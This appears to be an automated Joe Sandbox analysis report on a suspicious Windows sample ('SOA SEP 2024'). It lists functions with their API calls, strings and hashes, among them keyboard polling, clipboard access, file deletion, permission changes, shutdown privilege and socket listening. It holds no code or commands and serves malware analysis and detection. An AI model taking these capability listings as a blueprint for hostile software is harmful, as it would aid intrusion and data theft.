APIs

GetLocalTime.KERNEL32(?), ref: 007B09DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 007B09EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007B09FB
__wsplitpath.LIBCMT ref: 007B0A59
_wcscat.LIBCMT ref: 007B0A71
_wcscat.LIBCMT ref: 007B0A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007B0A98
SetCurrentDirectoryW.KERNEL32(?), ref: 007B0AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 007B0ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 007B0AFF
_wcscpy.LIBCMT ref: 007B0B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007B0B4A

Strings

*.*, xrefs: 007B0B05

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 8d0568da7eb3712c1cdf7d9b521c28d81100d29726faf88c06784346cf95333d
Instruction ID: e35310e69a9d7f217658d0026bfd6d8c69539c75ba5bc823fd170f965bc34dc7
Opcode Fuzzy Hash: 8d0568da7eb3712c1cdf7d9b521c28d81100d29726faf88c06784346cf95333d
Instruction Fuzzy Hash: CE613CB25043459FD710EF60C889A9FB3E8FF89310F048919F999D7251DB39E945CB92

Function 0079A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0079ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0079ABD7
Part of subcall function 0079ABBB: GetLastError.KERNEL32(?,0079A69F,?,?,?), ref: 0079ABE1
Part of subcall function 0079ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0079A69F,?,?,?), ref: 0079ABF0
Part of subcall function 0079ABBB: HeapAlloc.KERNEL32(00000000,?,0079A69F,?,?,?), ref: 0079ABF7
Part of subcall function 0079ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0079AC0E

Part of subcall function 0079AC56: GetProcessHeap.KERNEL32(00000008,0079A6B5,00000000,00000000,?,0079A6B5,?), ref: 0079AC62
Part of subcall function 0079AC56: HeapAlloc.KERNEL32(00000000,?,0079A6B5,?), ref: 0079AC69
Part of subcall function 0079AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0079A6B5,?), ref: 0079AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0079A6D0
_memset.LIBCMT ref: 0079A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0079A704
GetLengthSid.ADVAPI32(?), ref: 0079A715
GetAce.ADVAPI32(?,00000000,?), ref: 0079A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0079A76E
GetLengthSid.ADVAPI32(?), ref: 0079A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0079A79A
HeapAlloc.KERNEL32(00000000), ref: 0079A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0079A7C2
CopySid.ADVAPI32(00000000), ref: 0079A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0079A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0079A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0079A834

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 463de86a2dd5a72357f82d2cae4d6efc24894b34fe1c2e5f9f31f1fc5cc45809
Instruction ID: faab68cffc1ab60296057c0c62163af93b1bf004d165a9f0a413a72df32bdc92
Opcode Fuzzy Hash: 463de86a2dd5a72357f82d2cae4d6efc24894b34fe1c2e5f9f31f1fc5cc45809
Instruction Fuzzy Hash: 78513B71901249BFDF11DF95EC85EEEBBB9FF08300F048129E911AA291D7399E05CBA5

Function 00766F07 Relevance: 19.6, Strings: 15, Instructions: 883COMMON

Download Yara Rule

Strings

NO_AUTO_POSSESS), xrefs: 007E2CB0
UTF16), xrefs: 007E2C56
mmmmmm, xrefs: 007E2EB1
BSR_ANYCRLF), xrefs: 007E2EA0
ANYCRLF), xrefs: 007E2E7D
LF), xrefs: 007E2E26
CR), xrefs: 007E2E09
UCP), xrefs: 007E2C8F
ANY), xrefs: 007E2E60
NO_START_OPT), xrefs: 007E2CD1
LIMIT_RECURSION=, xrefs: 007E2D7E
CRLF), xrefs: 007E2E43
UTF), xrefs: 007E2C7C
LIMIT_MATCH=, xrefs: 007E2CF2
BSR_UNICODE), xrefs: 007E2EBA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$mmmmmm
API String ID: 0-574317713
Opcode ID: ecfe8041c107d46cf916f32e144a794dd49656efb3e1aa5875e45e6e1bc9ba4e
Instruction ID: 502c68202fa81b42c434f7cd5b88436b8c09b21104cc49c93b03c605ae730eb4
Opcode Fuzzy Hash: ecfe8041c107d46cf916f32e144a794dd49656efb3e1aa5875e45e6e1bc9ba4e
Instruction Fuzzy Hash: 8272A271E05259CBDF18CF59C8447AEB7B5FF48350F14816AE906EB281EB789E81CB90

Function 007A63F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007A6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007A5FA6,?), ref: 007A6ED8

Part of subcall function 007A72CB: GetFileAttributesW.KERNEL32(?,007A6019), ref: 007A72CC

_wcscat.LIBCMT ref: 007A6441
__wsplitpath.LIBCMT ref: 007A645F
FindFirstFileW.KERNEL32(?,?), ref: 007A6474
_wcscpy.LIBCMT ref: 007A64A3
_wcscat.LIBCMT ref: 007A64B8
_wcscat.LIBCMT ref: 007A64CA
DeleteFileW.KERNEL32(?), ref: 007A64DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 007A64EB
FindClose.KERNEL32(00000000), ref: 007A6506

Strings

\*.*, xrefs: 007A643B

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 21fcad6e8444309d4a55321d5fa72d543d8c3b4b805948ae9db348e0963f832a
Instruction ID: 1fa10411b792b76e56e6fb012089d5845ccea18dbac08ff1cb16a831ec529f9c
Opcode Fuzzy Hash: 21fcad6e8444309d4a55321d5fa72d543d8c3b4b805948ae9db348e0963f832a
Instruction Fuzzy Hash: F2319AB24483849EC731EBA488899DB77DCAF9A310F444A1EF6D4C3141EA39D50D87B7

Function 007C31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2BB5,?,?), ref: 007C3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C328E

Part of subcall function 0076936C: __swprintf.LIBCMT ref: 007693AB
Part of subcall function 0076936C: __itow.LIBCMT ref: 007693DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007C332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007C33C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007C3604
RegCloseKey.ADVAPI32(00000000), ref: 007C3611

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: b5fefb6d2754066b24262342a13e0762532306f70cb3123b8ef8bd7f3714a810
Instruction ID: d0df05dc099a2ec40abfe8ebe5e08ddc92e59e524f828d64c6e893a2451ca5ed
Opcode Fuzzy Hash: b5fefb6d2754066b24262342a13e0762532306f70cb3123b8ef8bd7f3714a810
Instruction Fuzzy Hash: 88E14A71604210EFCB15DF29C995E2ABBE8EF89314B04C56DF84ADB261DB38ED05CB52

Function 007A2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 007A2B5F
GetAsyncKeyState.USER32(000000A0), ref: 007A2BE0
GetKeyState.USER32(000000A0), ref: 007A2BFB
GetAsyncKeyState.USER32(000000A1), ref: 007A2C15
GetKeyState.USER32(000000A1), ref: 007A2C2A
GetAsyncKeyState.USER32(00000011), ref: 007A2C42
GetKeyState.USER32(00000011), ref: 007A2C54
GetAsyncKeyState.USER32(00000012), ref: 007A2C6C
GetKeyState.USER32(00000012), ref: 007A2C7E
GetAsyncKeyState.USER32(0000005B), ref: 007A2C96
GetKeyState.USER32(0000005B), ref: 007A2CA8

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a1fda4c626593f94a8b8169fe4b826cb3f180a2a68a5fb270c5adecd1edbf16d
Instruction ID: a492fefa4d4b40c56a47160f91a75cbedb89c464b8ccf251921dbbac71d0f453
Opcode Fuzzy Hash: a1fda4c626593f94a8b8169fe4b826cb3f180a2a68a5fb270c5adecd1edbf16d
Instruction Fuzzy Hash: 904109705047C96EFF359B6888443AABEA06F93314F048249D9C65A2C3EB9C9DC5C7B6

Function 007B6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 007B6D2E
EmptyClipboard.USER32 ref: 007B6D34
GlobalAlloc.KERNEL32(00000002,?), ref: 007B6D49
CloseClipboard.USER32 ref: 007B6DE8

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 39276c9a69c69f8337ef9395604fb7e370fbee84af49ebb1b3aa85031c9f2064
Instruction ID: 08532d3c28e33879a1b1a80c3531676d1826d67a36bcf50e8a6ee16fcc363e1d
Opcode Fuzzy Hash: 39276c9a69c69f8337ef9395604fb7e370fbee84af49ebb1b3aa85031c9f2064
Instruction Fuzzy Hash: EA216832301110AFDF21AF64DC89B6D77A8FF58750F04C019FA0A9B2A1DB3CAC018B98

Function 007BC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00799ABF: CLSIDFromProgID.OLE32 ref: 00799ADC
Part of subcall function 00799ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00799AF7
Part of subcall function 00799ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00799B05
Part of subcall function 00799ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00799B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007BC235
_memset.LIBCMT ref: 007BC242
_memset.LIBCMT ref: 007BC360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 007BC38C
CoTaskMemFree.OLE32(?), ref: 007BC397

Strings

NULL Pointer assignment, xrefs: 007BC3E5

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: cb4dd553cbc6a86b80a763da629037ea2f1e3088192f7723d99da4bb83e28dab
Instruction ID: c0a192be1275a698d8d447c983501cb350ee18e03c1a550968655411104222b4
Opcode Fuzzy Hash: cb4dd553cbc6a86b80a763da629037ea2f1e3088192f7723d99da4bb83e28dab
Instruction Fuzzy Hash: 19912871D00218EBDB11DF94DC95EEEBBB8EF08710F10816AF919A7281DB745A45CFA0

Function 007A79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0079B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079B180
Part of subcall function 0079B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0079B1AD
Part of subcall function 0079B134: GetLastError.KERNEL32 ref: 0079B1BA

ExitWindowsEx.USER32(?,00000000), ref: 007A7A0F

Strings

@, xrefs: 007A7A02
SeShutdownPrivilege, xrefs: 007A79DD
, xrefs: 007A79FD

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 3b6eddfcb28e88b1c4ce76e8cd4f5263bdecb0c7f12e54099acb0dc130b43386
Instruction ID: 016b6cea23c9fead934510deb462fb7ca53bdced087aa81c8cd2208fc9f85313
Opcode Fuzzy Hash: 3b6eddfcb28e88b1c4ce76e8cd4f5263bdecb0c7f12e54099acb0dc130b43386
Instruction Fuzzy Hash: 0E01F775759211BEFB3C176C9C8BBBF33589B46340F148624B913E60D2D96C5E00C1A4

Function 007B8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007B8CA8
WSAGetLastError.WSOCK32(00000000), ref: 007B8CB7
bind.WSOCK32(00000000,?,00000010), ref: 007B8CD3
listen.WSOCK32(00000000,00000005), ref: 007B8CE2
WSAGetLastError.WSOCK32(00000000), ref: 007B8CFC
closesocket.WSOCK32(00000000,00000000), ref: 007B8D10

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: d072d846fb7053bf5ea029bb9d47029db1e3b134f929c50e6102769300e8f6d4
Instruction ID: 8b50d3c860d115e5c1e75475e5e0515eaedf07be7bb571b2261625c68657da76
Opcode Fuzzy Hash: d072d846fb7053bf5ea029bb9d47029db1e3b134f929c50e6102769300e8f6d4
Instruction Fuzzy Hash: 9C21B671600200DFCB21EF64C999BAE77E9EF49314F108159F916AB3D2CB389D41CB61

Function 007A6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007A6554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 007A6564
Process32NextW.KERNEL32(00000000,0000022C), ref: 007A6583
__wsplitpath.LIBCMT ref: 007A65A7
_wcscat.LIBCMT ref: 007A65BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 007A65F9

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 86bb316add57e4c521dbe00ecdcb2056ba5670ecfc2179dd712ca400ea4de0c4
Instruction ID: caa7e5f7406829acc2cbbce499a2cbeb58a34009e0aa62ab966eb94d0e709c52
Opcode Fuzzy Hash: 86bb316add57e4c521dbe00ecdcb2056ba5670ecfc2179dd712ca400ea4de0c4
Instruction Fuzzy Hash: 4F216571D00258EBDB20ABA4CC88BDEB7BCAB49300F5445A5E505E7141E7799F95CB60

Function 00769B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00769ED4
VUUU, xrefs: 00769EA7
VUUU, xrefs: 007EBE14
mmmmmm, xrefs: 007EBD18
ERCP, xrefs: 00769C32
VUUU, xrefs: 00769E95

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU$mmmmmm
API String ID: 0-856741556
Opcode ID: 40eb8d6b934c14f6e5cca19d823776e5bc07dcb5c6244918ec4eebc4b58f7984
Instruction ID: e6d5221c1f84b8b22a22e359ef69f05bcdd0f0b3b291b429e07b3470a670a365
Opcode Fuzzy Hash: 40eb8d6b934c14f6e5cca19d823776e5bc07dcb5c6244918ec4eebc4b58f7984
Instruction Fuzzy Hash: 4C92BF75E0125ACBDF24CF59C8407EEB7B1BB58314F2481AADD16AB280E7399D81CF91

Function 007B923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007BA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 007BA84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 007B9296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 007B92B9

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: b0309955a4ea5b24fe8859dd61fb874bcfa37eed9a42879488a0430d40908dcc
Instruction ID: 5c087795101463ccce47746b7fb2e9fb2679d578aec288c840c1ddaef2d020ac
Opcode Fuzzy Hash: b0309955a4ea5b24fe8859dd61fb874bcfa37eed9a42879488a0430d40908dcc
Instruction Fuzzy Hash: 6141B570600100EFDF11AB68C885EBE77EDEF48764F148548FA5AAB392DA789D018B91

Function 007AEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007AEB8A
_wcscmp.LIBCMT ref: 007AEBBA
_wcscmp.LIBCMT ref: 007AEBCF
FindNextFileW.KERNEL32(00000000,?), ref: 007AEBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 007AEC0E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: e3cf4ec691bc497dccd2f2ad36b3175df5b6b84c82d96c4df6dd9ae96307b976
Instruction ID: 249fd636d790b6241da09d4518656317255eb6df60cdcf803dd78fe676d9ac74
Opcode Fuzzy Hash: e3cf4ec691bc497dccd2f2ad36b3175df5b6b84c82d96c4df6dd9ae96307b976
Instruction Fuzzy Hash: 0B41B075600301DFCB18DF28C495E99B7E8FF8A324F10865DE95A8B3A1DB39AD41CB61

Function 007C8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 007C8160
IsWindowEnabled.USER32 ref: 007C816E
GetForegroundWindow.USER32(?,?,00000001), ref: 007C817B
IsIconic.USER32 ref: 007C8189
IsZoomed.USER32 ref: 007C8197

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: b95bbb8331d4b60e44edf10ddfbd31e1d45153bf4ba6913fd293c39614a95558
Instruction ID: f8a4a593a87c0ed26ee3d21a14b9e092f62bf0916a23d827aad35b04ae3c488e
Opcode Fuzzy Hash: b95bbb8331d4b60e44edf10ddfbd31e1d45153bf4ba6913fd293c39614a95558
Instruction Fuzzy Hash: 7D11BE31301518AFE7212F26DC88F6E77D8EF94360B08842DE80ADB241CF789D0286A6

Function 0077E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

